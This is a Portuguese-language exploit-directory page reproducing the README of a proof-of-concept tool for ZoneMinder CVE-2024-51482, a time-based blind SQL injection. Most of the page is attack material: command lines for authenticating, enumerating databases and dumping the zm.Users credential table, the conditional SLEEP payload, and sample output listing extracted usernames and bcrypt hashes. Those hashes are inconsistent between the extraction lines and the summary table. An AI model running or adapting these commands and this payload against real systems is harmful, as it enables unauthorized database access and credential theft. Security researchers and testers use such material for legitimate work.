Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-51482-PoC — PoC de injeção SQL cega baseada em tempo autenticada para ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64) | Kitploit
Ferramentas/GitHubGitHub/plur1bu5/cve-2024-51482-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubplur1bu5/cve-2024-51482-poc

CVE-2024-51482-PoC

PoC de injeção SQL cega baseada em tempo autenticada para ZoneMinder CVE-2024-51482 (v1.37.* <= 1.37.64)

Ver Repositório
14há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-51482-PoC

Exploit de injeção SQL cega baseada em tempo autenticado para ZoneMinder v1.37. <= 1.37.64*

Visão Geral

Este é um exploit de prova de conceito para CVE-2024-51482, uma vulnerabilidade de injeção SQL cega baseada em tempo na funcionalidade de gerenciamento de eventos do ZoneMinder. O exploit requer autenticação e utiliza consultas SLEEP condicionais para extrair dados do banco de dados.

Características

  • Exploração autenticada - Login com credenciais ou cookie de sessão Detecção de comprimento - Pesquisa binária para encontrar o comprimento exato da string antes da extração
  • Extração paralela - Extração de caracteres multi-thread para velocidade
  • Opções no estilo sqlmap - Enumerar bases de dados, tabelas, colunas e extrair dados
  • Padrões seguros - Atraso de 3s, 5 threads para alta precisão
  • Acompanhamento de progresso - Progresso da extração em tempo real com modo verboso
  • Saída limpa - Exibição em tabela formatada para dados extraídos

Requisitos

pip install requests

Início Rápido

Modo Padrão - Extrair Credenciais

python3 poc.py -t example.local -u admin -p password

Com Cookie de Sessão

python3 poc.py -t example.local --cookie 'ZMSESSID_value'

Modo Verboso

python3 poc.py -t example.local -u admin -p password -v

Uso

Enumerar Bases de Dados

python3 poc.py -t example.local -u admin -p password --dbs

Enumerar Tabelas

python3 poc.py -t example.local -u admin -p password -D zm --tables

Enumerar Colunas

python3 poc.py -t example.local -u admin -p password -D zm -T Users --columns

Extrair Tabela Específica

python3 poc.py -t example.local -u admin -p password -D zm -T Users --dump

Opções

Obrigatório:
  -t, --target TARGET       URL alvo (IP, hostname ou URL completa)
  
Autenticação:
  -u, --username USERNAME   Nome de usuário para autenticação
  -p, --password PASSWORD   Senha para autenticação
  --cookie COOKIE           Cookie de sessão (ZMSESSID)

Enumeração:
  --dbs                     Enumerar bases de dados
  -D, --database DATABASE   Base de dados a usar
  --tables                  Enumerar tabelas
  -T, --table TABLE         Tabela a usar
  --columns                 Enumerar colunas
  --dump                    Extrair dados da tabela

Desempenho:
  --delay DELAY             Atraso em segundos (padrão: 3, seguro)
  --threads THREADS         Número de threads (padrão: 5, seguro)
  -v, --verbose             Mostrar progresso da extração

Ajuste de Desempenho

Modo Seguro (Recomendado)

python3 poc.py -t example.local -u admin -p password --delay 3 --threads 5
  • Velocidade: ~2-3 minutos por hash de senha
  • Precisão: Alta

Modo Rápido (Pode ter erros)

python3 poc.py -t example.local -u admin -p password --delay 1 --threads 20
  • Velocidade: ~30-60 segundos por hash de senha
  • Precisão: Pode produzir caracteres incorretos

Exemplo de Saída

[*] Alvo: http://example.local
[*] Atraso: 3s | Threads: 5
[+] Autenticado como admin
[*] Testando vulnerabilidade...
[+] Alvo é VULNERÁVEL!

[*] Modo padrão: Extraindo credenciais de zm.Users...
[*] Extraindo dados de 'zm.Users'...
[+] Extraído: admin
[+] Extraído: $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm
[+] Extraído: john
[+] Extraído: $2y$10$prZGnazejKcaLq9bKNexXOglBSqOl1hq07LW7AJ/QNqZolbXKfFG.

====================================================================================
| Usuário   | Senha                                                      |
====================================================================================
| admin     | $2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0jrtbm |
| john      | $2y$10$prABlsrtyjkiWv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG. |
====================================================================================

[+] 2 entradas extraídas

Como Funciona

  1. Autenticação - Faz login com credenciais ou usa cookie de sessão fornecido
  2. Teste de Vulnerabilidade - Confirma que o alvo é vulnerável com payload SLEEP simples
  3. Detecção de Comprimento - Usa pesquisa binária para encontrar o comprimento exato da string
  4. Extração Paralela - Extrai todas as posições de caracteres simultaneamente
  5. Exibição de Dados - Formata resultados em tabela limpa

Formato do Payload

O exploit usa SLEEP condicional:

1 AND (SELECT 1 FROM (SELECT(SLEEP(3-(IF(condition,0,3)))))test)
  • Condição VERDADEIRA: Sem atraso (0 segundos)
  • Condição FALSA: Atraso completo (3 segundos)

Solução de Problemas

Resultados Imprecisos

Se obtiver caracteres errados (ex.: $ torna-se 8):

# Aumente o atraso e reduza as threads
python3 poc.py -t example.local -u admin -p password --delay 4 --threads 3

Muito Lento

Se a extração estiver muito lenta:

# Diminua o atraso e aumente as threads (pode reduzir a precisão)
python3 poc.py -t example.local -u admin -p password --delay 2 --threads 10

Nenhum Dado Encontrado

Se o padrão zm.Users não existir:

# Enumere as bases de dados primeiro
python3 poc.py -t example.local -u admin -p password --dbs

# Depois enumere as tabelas
python3 poc.py -t example.local -u admin -p password -D database_name --tables

Informações do CVE

  • ID CVE: CVE-2024-51482
  • Versões Afetadas: ZoneMinder v1.37.* <= 1.37.64
  • Corrigido Na: v1.37.65
  • Tipo de Vulnerabilidade: Injeção SQL Cega Baseada em Tempo
  • Pontuação CVSS: A determinar

Aviso Legal

Esta ferramenta é exclusivamente para fins educacionais e de teste de segurança autorizado.

  • Não utilize esta ferramenta contra sistemas que não possui ou para os quais não tem permissão explícita para testar
  • O acesso não autorizado a sistemas informáticos é ilegal
  • O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta
  • Sempre obtenha autorização adequada antes de realizar avaliações de segurança

Referências

  • NVD - CVE-2024-51482
  • ZoneMinder GitHub

Licença

Este projeto é fornecido apenas para fins educacionais. Use de forma responsável e ética.


⭐ Se achar útil, por favor, dê uma estrela no repositório!

Baixar ferramenta